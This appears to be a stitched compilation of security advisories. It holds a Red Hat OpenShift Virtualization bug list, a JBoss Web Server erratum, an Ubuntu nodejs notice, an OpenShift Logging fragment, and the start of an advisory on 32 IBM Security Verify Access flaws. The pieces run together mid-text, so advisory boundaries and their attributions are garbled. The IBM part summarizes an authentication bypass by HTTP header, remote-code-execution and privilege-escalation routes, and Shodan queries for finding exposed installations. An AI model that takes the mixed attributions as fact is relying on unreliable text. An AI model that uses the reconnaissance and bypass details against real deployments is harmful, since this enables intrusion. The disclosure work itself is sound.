boot source even there are auto-upload boot sources\n2088129 - [SSP] webhook does not comply with restricted security context\n2088464 - [CDI] cdi-deployment does not comply with restricted security context\n2089391 - Import gzipped raw file causes image to be downloaded and uncompressed to TMPDIR\n2089744 - HCO should label its control plane namespace to admit pods at privileged security level\n2089751 - 4.12.0 containers\n2089804 - 4.12.0 rpms\n2091856 - ?Edit BootSource? action should have more explicit information when disabled\n2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add\n2092796 - [RFE] CPU|Memory display in the template card is not consistent with the display in the template drawer\n2093771 - The disk source should be PVC if the template has no auto-update boot source\n2093996 - kubectl get vmi API should always return primary interface if exist\n2094202 - Cloud-init username field should have hint\n2096285 - KubeVirt CR API documentation is missing docs for many fields\n2096780 - [RFE] Add ssh-key and sysprep to template scripts tab\n2097436 - Online disk expansion ignores filesystem overhead change\n2097586 - AccessMode should stay on ReadWriteOnce while editing a disk with storage class HPP\n2099556 - [RFE] Add option to enable RDP service for windows vm\n2099573 - [RFE] Improve template\u0027s message about not editable\n2099923 - [RFE] Merge \"SSH access\" and \"SSH command\" into one\n2100290 - Error is not dismissed on catalog review page\n2100436 - VM list filtering ignores VMs in error-states\n2100442 - [RFE] allow enabling and disabling SSH service while VM is shut down\n2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS\n2100629 - Update nested support KBASE article\n2100679 - The number of hardware devices is not correct in vm overview tab\n2100682 - All hardware devices get deleted while just delete one\n2100684 - Workload profile are not editable during creation and after creation\n2101144 - VM filter has two \"Other\" checkboxes which are triggered together\n2101164 - [dark mode] Number of alerts in Alerts card not visible enough in dark mode\n2101167 - Edit buttons clickable area is too large. \n2101333 - [e2e] elements on Template Scheduling tab are missing proper data-test-id\n2101335 - Clone action enabled in VM list kebab button for a VM in CrashLoopBackOff state\n2101390 - Easy to miss the \"tick\" when adding GPU device to vm via UI\n2101394 - [e2e] elements on VM Scripts tab are missing proper data-test-id\n2101423 - wrong user name on using ignition\n2101430 - Using CLOUD_USER_PASSWORD in Templates parameters breaks VM review page\n2101445 - \"Pending changes - Boot Order\"\n2101454 - Cannot add PVC boot source to template in \u0027Edit Boot Source Reference\u0027 view as a non-priv user\n2101499 - Cannot add NIC to VM template as non-priv user\n2101501 - NAME parameter in VM template has no effect. \n2101628 - non-priv user cannot load dataSource while edit template\u0027s rootdisk\n2101667 - VMI view is not aligned with vm and tempates\n2101681 - All templates are labeling \"source available\" in template list page\n2102074 - VM Creation time on VM Overview Details card lacks string\n2102125 - vm clone modal is displaying DV size instead of PVC size\n2102132 - align the utilization card of single VM overview with the design\n2102138 - Should the word \"new\" be removed from \"Create new VirtualMachine from catalog\"?\n2102256 - Add button moved to right\n2102448 - VM disk is deleted by uncheck \"Delete disks (1x)\" on delete modal\n2102475 - Template \u0027vm-template-example\u0027 should be filtered by \u0027Fedora\u0027 rather than \u0027Other\u0027\n2102561 - sysprep-info should link to downstream doc\n2102737 - Clone a VM should lead to vm overview tab\n2102740 - \"Save\" button on vm clone modal should be \"Clone\"\n2103806 - \"404: Not Found\" appears shortly by clicking the PVC link on vm disk tab\n2103807 - PVC is not named by VM name while creating vm quickly\n2103817 - Workload profile values in vm details should align with template\u0027s value\n2103844 - VM nic model is empty\n2104331 - VM list page scroll up automatically\n2104402 - VM create button is not enabled while adding multiple environment disks\n2104422 - Storage status report \"OpenShift Data Foundation is not available\" even the operator is installed\n2104424 - Enable descheduler or hide it on template\u0027s scheduling tab\n2104479 - [4.12] Cloned VM\u0027s snapshot restore fails if the source VM disk is deleted\n2104480 - Alerts in VM overview tab disappeared after a few seconds\n2104785 - \"Add disk\" and \"Disks\" are on the same line\n2104859 - [RFE] Add \"Copy SSH command\" to VM action list\n2105257 - Can\u0027t set log verbosity level for virt-operator pod\n2106175 - All pages are crashed after visit Virtualization -\u003e Overview\n2106963 - Cannot add configmap for windows VM\n2107279 - VM Template\u0027s bootable disk can be marked as bootable\n2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read\n2107371 - CVE-2022-30630 golang: io/fs: stack exhaustion in Glob\n2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header\n2107376 - CVE-2022-1962 golang: go/parser: stack exhaustion in all Parse* functions\n2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working\n2107386 - CVE-2022-30632 golang: path/filepath: stack exhaustion in Glob\n2107388 - CVE-2022-30635 golang: encoding/gob: stack exhaustion in Decoder.Decode\n2107390 - CVE-2022-28131 golang: encoding/xml: stack exhaustion in Decoder.Skip\n2107392 - CVE-2022-30633 golang: encoding/xml: stack exhaustion in Unmarshal\n2108339 - datasource does not provide timestamp when updated\n2108638 - When chosing a vm or template while in all-namespace, and returning to list, namespace is changed\n2109818 - Upstream metrics documentation is not detailed enough\n2109975 - DataVolume fails to import \"cirros-container-disk-demo\" image\n2110256 - Storage -\u003e PVC -\u003e upload data, does not support source reference\n2110562 - CNV introduces a compliance check fail in \"ocp4-moderate\" profile - routes-protected-by-tls\n2111240 - GiB changes to B in Template\u0027s Edit boot source reference modal\n2111292 - kubevirt plugin console is crashed after creating a vm with 2 nics\n2111328 - kubevirt plugin console crashed after visit vmi page\n2111378 - VM SSH command generated by UI points at api VIP\n2111744 - Cloned template should not label `app.kubernetes.io/name: common-templates`\n2111794 - the virtlogd process is taking too much RAM! (17468Ki \u003e 17Mi)\n2112900 - button style are different\n2114516 - Nothing happens after clicking on Fedora cloud image list link\n2114636 - The style of displayed items are not unified on VM tabs\n2114683 - VM overview tab is crashed just after the vm is created\n2115257 - Need to Change system-product-name to \"OpenShift  Virtualization\" in CNV-4.12\n2115258 - The storageclass of VM disk is different from quick created and customize created after changed the default storageclass\n2115280 - [e2e] kubevirt-e2e-aws see two duplicated navigation items\n2115769 - Machine type is updated to rhel8.6.0 in KV CR but not in Templates\n2116225 - The filter keyword of the related operator \u0027Openshift Data Foundation\u0027 is \u0027OCS\u0027 rather than \u0027ODF\u0027\n2116644 - Importer pod is failing to start with error \"MountVolume.SetUp failed for volume \"cdi-proxy-cert-vol\" : configmap \"custom-ca\" not found\"\n2117549 - Cannot edit cloud-init data after add ssh key\n2117803 - Cannot edit ssh even vm is stopped\n2117813 - Improve descriptive text of VM details while VM is off\n2117872 - CVE-2022-1798 kubeVirt: Arbitrary file read on the host from KubeVirt VMs\n2118257 - outdated doc link tolerations modal\n2118823 - Deprecated API 1.25 call: virt-cdi-controller/v0.0.0 (linux/amd64) kubernetes/$Format\n2119069 - Unable to start windows VMs on PSI setups\n2119128 - virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24\n2119309 - readinessProbe in VM stays on failed\n2119615 - Change the disk size causes the unit changed\n2120907 - Cannot filter disks by label\n2121320 - Negative values in migration metrics\n2122236 - Failing to delete HCO with SSP sticking around\n2122990 - VMExport should check APIGroup\n2124147 - \"ReadOnlyMany\" should not be added to supported values in memory dump\n2124307 - Ui crash/stuck on loading when trying to detach disk on a VM\n2124528 - On upgrade, when live-migration is failed due to an infra issue, virt-handler continuously and endlessly tries to migrate it\n2124555 - View documentation link on MigrationPolicies page des not work\n2124557 - MigrationPolicy description is not displayed on Details page\n2124558 - Non-privileged user can start MigrationPolicy creation\n2124565 - Deleted DataSource reappears in list\n2124572 - First annotation can not be added to DataSource\n2124582 - Filtering VMs by OS does not work\n2124594 - Docker URL validation is inconsistent over application\n2124597 - Wrong case in Create DataSource menu\n2126104 - virtctl image-upload hangs waiting for pod to be ready with missing access mode defined in the storage profile\n2126397 - many KubeVirtComponentExceedsRequestedMemory alerts in Firing state\n2127787 - Expose the PVC source of the dataSource on UI\n2127843 - UI crashed by selecting \"Live migration network\"\n2127931 - Change default time range on Virtualization -\u003e Overview -\u003e Monitoring dashboard to 30 minutes\n2127947 - cluster-network-addons-config tlsSecurityProfle takes a long time to update after setting APIServer\n2128002 - Error after VM template deletion\n2128107 - sriov-manage command fails to enable SRIOV Virtual functions on the Ampere GPU Cards\n2128872 - [4.11]Can\u0027t restore cloned VM\n2128948 - Cannot create DataSource from default YAML\n2128949 - Cannot create MigrationPolicy from example YAML\n2128997 - [4.11.1]virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24\n2129013 - Mark Windows 11 as TechPreview\n2129234 - Service is not deleted along with the VM when the VM is created from a template with service\n2129301 - Cloud-init network data don\u0027t wipe out on uncheck checkbox \u0027Add network data\u0027\n2129870 - crypto-policy : Accepting TLS 1.3 connections by validating webhook\n2130509 - Auto image import in failed state with data sources pointing to external manually-created PVC/DV\n2130588 - crypto-policy : Common Ciphers support by apiserver and hco\n2130695 - crypto-policy : Logging Improvement and publish the source of ciphers\n2130909 - Non-privileged user can start DataSource creation\n2131157 - KV data transfer rate chart in VM Metrics tab is not displayed\n2131165 - [dark mode] Additional statuses accordion on Virtualization Overview page not visible enough\n2131674 - Bump virtlogd memory requirement to 20Mi\n2132031 - Ensure Windows 2022 Templates are marked as TechPreview like it is done now for Windows 11\n2132682 - Default YAML entity name convention. \n2132721 - Delete dialogs\n2132744 - Description text is missing in Live Migrations section\n2132746 - Background is broken in Virtualization Monitoring page\n2132783 - VM can not be created from Template with edited boot source\n2132793 - Edited Template BSR is not saved\n2132932 - Typo in PVC size units menu\n2133540 - [pod security violation audit] Audit violation in \"cni-plugins\" container should be fixed\n2133541 - [pod security violation audit] Audit violation in \"bridge-marker\" container should be fixed\n2133542 - [pod security violation audit] Audit violation in \"manager\" container should be fixed\n2133543 - [pod security violation audit] Audit violation in \"kube-rbac-proxy\" container should be fixed\n2133655 - [pod security violation audit] Audit violation in \"cdi-operator\" container should be fixed\n2133656 - [4.12][pod security violation audit] Audit violation in \"hostpath-provisioner-operator\" container should be fixed\n2133659 - [pod security violation audit] Audit violation in \"cdi-controller\" container should be fixed\n2133660 - [pod security violation audit] Audit violation in \"cdi-source-update-poller\" container should be fixed\n2134123 - KubeVirtComponentExceedsRequestedMemory Alert for virt-handler pod\n2134672 - [e2e] add data-test-id for catalog -\u003e storage section\n2134825 - Authorization for expand-spec endpoint missing\n2135805 - Windows 2022 template is missing vTPM and UEFI params in spec\n2136051 - Name jumping when trying to create a VM with source from catalog\n2136425 - Windows 11 is detected as Windows 10\n2136534 - Not possible to specify a TTL on VMExports\n2137123 - VMExport: export pod is not PSA complaint\n2137241 - Checkbox about delete vm disks is not loaded while deleting VM\n2137243 - registery input add docker prefix twice\n2137349 - \"Manage source\" action infinitely loading on DataImportCron details page\n2137591 - Inconsistent dialog headings/titles\n2137731 - Link of VM status in overview is not working\n2137733 - No link for VMs in error status in \"VirtualMachine statuses\" card\n2137736 - The column name \"MigrationPolicy name\" can just be \"Name\"\n2137896 - crypto-policy: HCO should pick TLSProfile from apiserver if not provided explicitly\n2138112 - Unsupported S3 endpoint option in Add disk modal\n2138119 - \"Customize VirtualMachine\" flow is not user-friendly because settings are split into 2 modals\n2138199 - Win11 and Win22 templates are not filtered properly by Template provider\n2138653 - Saving Template prameters reloads the page\n2138657 - Setting DATA_SOURCE_* Template parameters makes VM creation fail\n2138664 - VM that was created with SSH key fails to start\n2139257 - Cannot add disk via \"Using an existing PVC\"\n2139260 - Clone button is disabled while VM is running\n2139293 - Non-admin user cannot load VM list page\n2139296 - Non-admin cannot load MigrationPolicies page\n2139299 - No auto-generated VM name while creating VM by non-admin user\n2139306 - Non-admin cannot create VM via customize mode\n2139479 - virtualization overview crashes for non-priv user\n2139574 - VM name gets \"emptyname\" if click the create button quickly\n2139651 - non-priv user can click create when have no permissions\n2139687 - catalog shows template list for non-priv users\n2139738 - [4.12]Can\u0027t restore cloned VM\n2139820 - non-priv user cant reach vm details\n2140117 - Provide upgrade path from 4.11.1-\u003e4.12.0\n2140521 - Click the breadcrumb list about \"VirtualMachines\" goes to undefined project\n2140534 - [View only] it should give a permission error when user clicking the VNC play/connect button as a view only user\n2140627 - Not able to select storageClass if there is no default storageclass defined\n2140730 - Links on Virtualization Overview page lead to wrong namespace for non-priv user\n2140808 - Hyperv feature set to \"enabled: false\" prevents scheduling\n2140977 - Alerts number is not correct on Virtualization overview\n2140982 - The base template of cloned template is \"Not available\"\n2140998 - Incorrect information shows in overview page per namespace\n2141089 - Unable to upload boot images. \n2141302 - Unhealthy states alerts and state metrics are missing\n2141399 - Unable to set TLS Security profile for CDI using HCO jsonpatch annotations\n2141494 - \"Start in pause mode\" option is not available while creating the VM\n2141654 - warning log appearing on VMs: found no SR-IOV networks\n2141711 - Node column selector is redundant for non-priv user\n2142468 - VM action \"Stop\" should not be disabled when VM in pause state\n2142470 - Delete a VM or template from all projects leads to 404 error\n2142511 - Enhance alerts card in overview\n2142647 - Error after MigrationPolicy deletion\n2142891 - VM latency checkup: Failed to create the checkup\u0027s Job\n2142929 - Permission denied when try get instancestypes\n2143268 - Topolvm storageProfile missing accessModes and volumeMode\n2143498 - Could not load template while creating VM from catalog\n2143964 - Could not load template while creating VM from catalog\n2144580 - \"?\" icon is too big in VM Template Disk tab\n2144828 - \"?\" icon is too big in VM Template Disk tab\n2144839 - Alerts number is not correct on Virtualization overview\n2153849 - After upgrade to 4.11.1-\u003e4.12.0 hco.spec.workloadUpdateStrategy value is getting overwritten\n2155757 - Incorrect upstream-version label \"v1.6.0-unstable-410-g09ea881c\" is tagged to 4.12 hyperconverged-cluster-operator-container and hyperconverged-cluster-webhook-container\n\n5. Description:\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nTomcat Servlet container, JBoss HTTP Connector (mod_cluster), the\nPicketLink Vault extension for Apache Tomcat, and the Tomcat Native\nlibrary. This release includes bug fixes,\nenhancements and component upgrades, which are documented in the Release\nNotes, linked to in the References. \n\nThe References section of this erratum contains a download link for the\nupdate. This software, such as Apache HTTP Server, is\ncommon to multiple JBoss middleware products, and is packaged under Red Hat\nJBoss Core Services to allow for faster distribution of updates, and for a\nmore consistent update experience. \n\nSecurity Fix(es):\n\n* libxml2: integer overflows with XML_PARSE_HUGE (CVE-2022-40303)\n* libxml2: dict corruption caused by entity reference cycles\n(CVE-2022-40304)\n* expat: a use-after-free in the doContent function in xmlparse.c\n(CVE-2022-40674)\n* zlib: a heap-based buffer over-read or buffer overflow in inflate in\ninflate.c via a large gzip header extra field (CVE-2022-37434)\n* curl: HSTS bypass via IDN (CVE-2022-42916)\n* curl: HTTP proxy double-free (CVE-2022-42915)\n* curl: POST following PUT confusion (CVE-2022-32221)\n* httpd: mod_proxy: X-Forwarded-For dropped by hop-by-hop mechanism\n(CVE-2022-31813)\n* httpd: mod_sed: DoS vulnerability (CVE-2022-30522)\n* httpd: out-of-bounds read in ap_strcmp_match() (CVE-2022-28615)\n* httpd: out-of-bounds read via ap_rwrite() (CVE-2022-28614)\n* httpd: mod_proxy_ajp: Possible request smuggling (CVE-2022-26377)\n* curl: control code in cookie denial of service (CVE-2022-35252)\n* zlib: a heap-based buffer over-read or buffer overflow in inflate in\ninflate.c via a large gzip header extra field (CVE-2022-37434)\n* jbcs-httpd24-httpd: httpd: mod_isapi: out-of-bounds read (CVE-2022-28330)\n* curl: Unpreserved file permissions (CVE-2022-32207)\n* curl: various flaws (CVE-2022-32206 CVE-2022-32208)\n* openssl: the c_rehash script allows command injection (CVE-2022-2068)\n* openssl: c_rehash script allows command injection (CVE-2022-1292)\n* jbcs-httpd24-httpd: httpd: core: Possible buffer overflow with very large\nor unlimited LimitXMLRequestBody (CVE-2022-22721)\n* jbcs-httpd24-httpd: httpd: mod_sed: Read/write beyond bounds\n(CVE-2022-23943)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. Bugs fixed (https://bugzilla.redhat.com/):\n\n2064319 - CVE-2022-23943 httpd: mod_sed: Read/write beyond bounds\n2064320 - CVE-2022-22721 httpd: core: Possible buffer overflow with very large or unlimited LimitXMLRequestBody\n2081494 - CVE-2022-1292 openssl: c_rehash script allows command injection\n2094997 - CVE-2022-26377 httpd: mod_proxy_ajp: Possible request smuggling\n2095000 - CVE-2022-28330 httpd: mod_isapi: out-of-bounds read\n2095002 - CVE-2022-28614 httpd: Out-of-bounds read via ap_rwrite()\n2095006 - CVE-2022-28615 httpd: Out-of-bounds read in ap_strcmp_match()\n2095015 - CVE-2022-30522 httpd: mod_sed: DoS vulnerability\n2095020 - CVE-2022-31813 httpd: mod_proxy: X-Forwarded-For dropped by hop-by-hop mechanism\n2097310 - CVE-2022-2068 openssl: the c_rehash script allows command injection\n2099300 - CVE-2022-32206 curl: HTTP compression denial of service\n2099305 - CVE-2022-32207 curl: Unpreserved file permissions\n2099306 - CVE-2022-32208 curl: FTP-KRB bad message verification\n2116639 - CVE-2022-37434 zlib: heap-based buffer over-read and overflow in inflate() in inflate.c via a large gzip header extra field\n2120718 - CVE-2022-35252 curl: control code in cookie denial of service\n2130769 - CVE-2022-40674 expat: a use-after-free in the doContent function in xmlparse.c\n2135411 - CVE-2022-32221 curl: POST following PUT confusion\n2135413 - CVE-2022-42915 curl: HTTP proxy double-free\n2135416 - CVE-2022-42916 curl: HSTS bypass via IDN\n2136266 - CVE-2022-40303 libxml2: integer overflows with XML_PARSE_HUGE\n2136288 - CVE-2022-40304 libxml2: dict corruption caused by entity reference cycles\n\n5. ==========================================================================\nUbuntu Security Notice USN-6457-1\nOctober 30, 2023\n\nnodejs vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 22.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in Node.js. \n\nSoftware Description:\n- nodejs: An open-source, cross-platform JavaScript runtime environment. \n\nDetails:\n\nTavis Ormandy discovered that Node.js incorrectly handled certain inputs. If a\nuser or an automated system were tricked into opening a specially crafted\ninput file, a remote attacker could possibly use this issue to cause a\ndenial of service. (CVE-2022-0778)\n\nElison Niven discovered that Node.js incorrectly handled certain inputs. (CVE-2022-1292)\n\nChancen and Daniel Fiala discovered that Node.js incorrectly handled certain\ninputs. (CVE-2022-2068)\n\nAlex Chernyakhovsky discovered that Node.js incorrectly handled certain\ninputs. (CVE-2022-2097)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 22.04 LTS:\n   libnode-dev                     12.22.9~dfsg-1ubuntu3.1\n   libnode72                       12.22.9~dfsg-1ubuntu3.1\n   nodejs                          12.22.9~dfsg-1ubuntu3.1\n   nodejs-doc                      12.22.9~dfsg-1ubuntu3.1\n\nIn general, a standard system update will make all the necessary changes. Solution:\n\nFor OpenShift Container Platform 4.9 see the following documentation, which\nwill be updated shortly, for detailed release notes:\n\nhttps://docs.openshift.com/container-platform/4.9/logging/cluster-logging-release-notes.html\n\nFor Red Hat OpenShift Logging 5.3, see the following instructions to apply\nthis update:\n\nhttps://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n2064698 - CVE-2020-36518 jackson-databind: denial of service via a large depth of nested objects\n2135244 - CVE-2022-42003 jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS\n2135247 - CVE-2022-42004 jackson-databind: use of deeply nested arrays\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nLOG-3293 - log-file-metric-exporter container has not limits exhausting the resources of the node\n\n6. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n## Advisory Information\n\nTitle: 32 vulnerabilities in IBM Security Verify Access\nAdvisory URL: https://pierrekim.github.io/advisories/2024-ibm-security-verify-access.txt\nBlog URL: https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html\nDate published: 2024-11-01\nVendors contacted: IBM\nRelease mode: Released\nCVE: CVE-2022-2068, CVE-2023-30997, CVE-2023-30998, CVE-2023-31001, CVE-2023-31004, CVE-2023-31005, CVE-2023-31006, CVE-2023-32328, CVE-2023-32329, CVE-2023-32330, CVE-2023-38267, CVE-2023-38267, CVE-2023-38368, CVE-2023-38369, CVE-2023-38370, CVE-2023-43017, CVE-2024-25027, CVE-2024-35137, CVE-2024-35139, CVE-2024-35140, CVE-2024-35141, CVE-2024-35142\n\n\n\n## Product description\n\n\u003e IBM Security Verify Access is a complete authorization and network security policy management solution. It provides end-to-end protection of resources over geographically dispersed intranets and extranets. \n\u003e In addition to state-of-the-art security policy management, IBM Security Verify Access provides authentication, authorization, data security, and centralized resource management capabilities. \n\u003e \n\u003e IBM Security Verify Access offers the following features:\n\u003e\n\u003e - Authentication\n\u003e\n\u003e Provides a wide range of built-in authenticators and supports external authenticators. \n\u003e \n\u003e - Authorization\n\u003e\n\u003e Provides permit and deny decisions for protected resources requests in the secure domain through the authorization API. \n\u003e \n\u003e - Data security and centralized resource management\n\u003e\n\u003e Manages secure access to private internal network-based resources by using the public Internet\u0027s broad connectivity and ease of use with a corporate firewall system. \n\u003e\n\u003e From https://www.ibm.com/docs/en/sva/10.0.8?topic=overview-introduction-security-verify-access\n\n\n\n## Vulnerability Summary\n\nVulnerable versions: IBM Security Verify Access \u003c 10.0.8. \n\nThe summary of the vulnerabilities is as follows:\n\n1. non-assigned CVE vulnerability - Authentication Bypass on IBM Security Verify Runtime\n2. CVE-2024-25027 - Reuse of snapshot private keys\n3. CVE-2023-30997 - Local Privilege Escalation using OpenLDAP\n4. CVE-2023-30998 - Local Privilege Escalation using rpm\n5. CVE-2023-38267, CVE-2024-35141, CVE-2024-35142 - Insecure setuid binaries and multiple Local Privilege Escalation in IBM codes\n5.1. CVE-2023-38267 - Local Privilege Escalation using mesa_config - import of a new snapshot\n5.2. CVE-2024-35141 - Local Privilege Escalation using mesa_config - command injections\n5.3. CVE-2023-38267 - Local Privilege Escalation using mesa_cli - import of a new snapshot\n5.4. CVE-2024-35142 - Local Privilege Escalation using mesa_cli - telnet escape shell\n6. CVE-2023-43017 - PermitRootLogin set to yes\n8. CVE-2024-35137 and CVE-2024-35139 - Lack of password for the `cluster` user\n9. CVE-2023-38368 - Non-standard way of storing hashes and world-readable files containing hashes\n10. CVE-2023-38369 - Hardcoded PKCS#12 files\n11. CVE-2023-31001 - Incorrect permissions in verify-access-dsc (race condition and leak of private key\n12. non-assigned CVE vulnerability - Insecure health_check.sh script in verify-access (race condition and leak of private key)\n13. CVE-2024-35140 - Local Privilege Escalation due to insecure health_check.sh script in verify-access (insecure SSL, insecure files)\n14. CVE-2024-35140 (duplicate?) - Local Privilege Escalation due to insecure health_check.sh script in verify-access-dsc (insecure SSL, insecure file)\n15. CVE-2023-31004 - Remote Code Execution due to insecure download of snapshot in verify-access-dsc, verify-access-runtime and verify-access-wrp\n16. CVE-2023-31005 - Lack of authentication in Postgres inside verify-access-runtime\n17. CVE-2023-31006 - Null pointer dereference in dscd - Remote DoS against DSC instances\n18. CVE-2023-32327 - XML External Entity (XXE) in dscd\n19. CVE-2023-38370 - Remote Code Execution due to insecure download of rpm and zip files in verify-access-dsc, verify-access-runtime and verify-access-wrp (/usr/sbin/install_isva.sh)\n20. non-assigned CVE vulnerability - Remote Code Execution due to insecure download of rpm in verify-access-runtime (/usr/sbin/install_java_liberty.sh)\n21. CVE-2023-32328 - Remote Code Execution due to insecure Repository configuration\n22. CVE-2023-32329 - Additional repository configuration (potential supply-chain attack)\n23. non-assigned CVE vulnerability - Remote Code Execution due to insecure /usr/sbin/install_system.sh script in verify-access-runtime\n24. CVE-2023-32330 - Remote Code Execution due to insecure reload script in verify-access-runtime\n25. CVE-2023-32330 (duplicate?) - Remote Code Execution due to insecure reload script in verify-access-wrp\n26. non-assigned CVE vulnerability - Hardcoded private key for IBM ISS (ibmcom/verify-access)\n27. non-assigned CVE vulnerability - dcatool using an outdated OpenSSL library (ibmcom/verify-access)\n28. non-assigned CVE vulnerability - iss-lum using an outdated OpenSSL library (ibmcom/verify-access) and hardcoded keys\n29. non-assigned CVE vulnerability - Outdated \"IBM Crypto for C\" library\n30. non-assigned CVE vulnerability - Webseald using outdated code with remotely exploitable vulnerabilities\n30.1. Libmodsecurity.so - 1 non-assigned CVE vulnerability\n30.2. libtivsec_yamlcpp.so - 4 CVEs\n30.3. libtivsec_xml4c.so - outdated Xerces-C library\n31. non-assigned CVE vulnerability - Outdated and untrusted CAs used in the Docker images\n32. non-assigned CVE vulnerability - Lack of privilege separation in Docker instances\n\nTL;DR: An attacker can compromise IBM Security Verify Access using multiple vulnerabilities (7 RCEs, 1 auth bypass, 8 LPEs and some additional vulnerabilities). \nIBM Security Verify Access is a SSO solution mainly used by banks, Fortune 500 companies and governmental entities. \n\n_Miscellaneous notes_:\n\nThe vulnerabilities were found in October 2022 and were communicated to IBM at the beginning of 2023. They ultimately were patched at the end of June 2024 (after 18 months). Requiring 1.5 years to provide security patches for vulnerabilities found in a SSO solution does not appear to be in par with current cybersecurity risks and is quite worrying. Update: Following communications with IBM PSIRT in September 2024 regarding missing CVEs and the publication of this security advisory, it was confirmed that at least one vulnerability was not yet patched (a 2017 DoS in libinjection, no CVE). \n\nThe vulnerabilities were patched progressively in the 10.0.6, 10.0.7 and 10.0.8 versions. It is unclear if all the non-assigned CVE vulnerabilities have been patched but IBM confirmed that all the vulnerabilities were patched and then IBM closed all the corresponding tickets. \n\nOther issues had been reported but ultimately were dismissed (e.g. hard-to-trigger crashes and I did not have any time left for this security assessment). \n\nCommunication with IBM was difficult since IBM closed the tickets used to track the vulnerabilities multiple times without releasing any security patches. The timeline provided at the later part of this advisory provides an overview of the interactions I have had with IBM. IBM PSIRT redirected queries to IBM support and IBM support provided extremely disappointing answers to vulnerabilities. When I went back to IBM PSIRT with these answers, IBM PSIRT refused them and provided opposite answers. Reporting vulnerabilities to IBM was also inefficient. When I asked IBM for missing CVEs in September 2024, IBM PSIRT confirmed that patches were missing. All the tickets were already closed in June 2024 by IBM and I previously received confirmation that all the vulnerabilities had been patched. \n\nSecurity bulletins were mainly found by following @CVEnew (https://twitter.com/CVEnew) and I had to guess the patched vulnerabilities from the CVE descriptions. After some requests, thankfully, IBM sent me a list of CVEs corresponding to the vulnerabilities I reported. \n\nIt appears that some CVEs are still missing. \n\nFinally, another CVE (CVE-2023-38371 - https://nvd.nist.gov/vuln/detail/CVE-2023-38371), not present in this advisory) was assigned by IBM but refers to an issue (_V-[REDACTED] - Insecure SSLv3 connections to the DSC servers_ in the report sent to IBM) that was confirmed **not** to be a vulnerability by IBM and by me, after a second analysis. This CVE is likely to be revoked. Update: IBM confirmed in September 2024 that this CVE was bogus after I signaled IBM that this is an incorrect CVE. \n\n_Impacts_\n\nAn attacker can compromise the entire authentication infrastructure based on IBM Security Verify Access (ISAM/ISVA appliances and IBM Docker images) using multiple vulnerabilities (7 RCEs, 1 auth bypass, 8 LPEs and some additional vulnerabilities). \nRegarding the threat model, it is worth noting that attackers must be able to MITM traffic or get access inside the LAN of the tested organizations to exploit these vulnerabilities. \n\nWhen the IBM Security Verify Access (ISVA) runtime docker instance (a core component of this solution) is reachable over the network, an attacker can bypass the entire authentication and interact with this back-end instance as any user, providing a complete control over any user without authentication.  The IBM Security Verify Runtime Docker instance provides the advanced access control and federation capabilities and is a core functionality of IBM Security Verify Access: it provides a back-end for authenticating users (for example, it supports HOTP, TOTP, RSA OTP, MAC OTP with email delivery, username and password, FIDO2/WebAuthn...). The back-end APIs provided by the IBM Security Verify Access runtime docker instance are vulnerable to an authentication bypass vulnerability. Since the back-end is fully reachable, this vulnerability allows an attacker to get persistence in a targeted infrastructure by enrolling malicious Multi-Factor Authenticators to any user, without authentication (e.g. an authenticator assigned to any user, protected by a PIN (or not) chosen by the threat actor). In an offensive scenario, an attacker will likely delete authenticators for admins and security team and enroll new authenticators corresponding to admin accounts and get full control over the infrastructure while locking out legit admins. \n\nThis vulnerability has not been patched and IBM recommends implementing network restrictions or using mutual TLS authentication and following best practices:\n\n\u003e Note: If the runtime container is exposed on an external IP address there must be network restrictions in place to ensure that access is not allowed from untrusted clients, or the runtime must be configured to require mutual TLS authentication. \n\u003e \n\u003e From https://www.ibm.com/docs/en/sva/10.0.8?topic=support-docker-image-verify-access-runtime#concept_thc_pnz_w4b__title__1\n\u003e\n\u003e And from https://www.ibm.com/docs/en/sva/10.0.8?topic=settings-runtime-parameters\n\u003e\n\u003e And from https://www.ibm.com/docs/en/sva/10.0.8?topic=appliance-tuning-runtime-application-parameters-tracing-specifications\n\nNote that even with network restrictions, a low privileged user on a trusted machine can fully compromise the authentication solution, since the back-end used to manage the entire authentication infrastructure can be reached without authentication by sending a specific HTTP header. Network exposure of this back-end (e.g. with IPv6, from monitoring servers, from docker servers, from webseal servers [that must, by design, reach the authentication back-end], or using a SSRF vulnerability) means a full take over of the authentication infrastructure, which can be quite problematic for large organizations. \n\n_Recommendations_\n\n- - Apply security patches. \n- - Use network segmentation to isolate the Security Verify Access (ISVA) Runtime Docker instance. \n- - Implement the optional authentication based on SSL certificates in the ISVA Runtime Docker instance (this functionality has been added in the latest ISVA release (10.0.8)). \n- - Flag any additional authenticator added to an account as suspicious. \n- - Review logs for any HTTP access from untrusted IPs to the Security Verify Access Runtime Docker instance. \n\n\nShodan provides a list of websites using this technology. For SOC teams, I suggest using Shodan to check if your organization is using IBM Security Verify Access and following IBM\u0027s security recommendations. Please note that due to the versatility of this solution, it is very difficult to correctly detect affected installations using a blackbox approach:\n\n- - https://www.shodan.io/search?query=http.favicon.hash%3A-2069014068, 1,740 results as of October 30, 2024\n- - https://www.shodan.io/search?query=webseal, 1,083 results as of October 30, 2024\n- - https://www.shodan.io/search?query=CP%3D%22NON+CUR+OTPi+OUR+NOR+UNI%22, 6,673 results as of October 30, 2024\n\n\n\n## Details - Authentication Bypass on IBM Security Verify 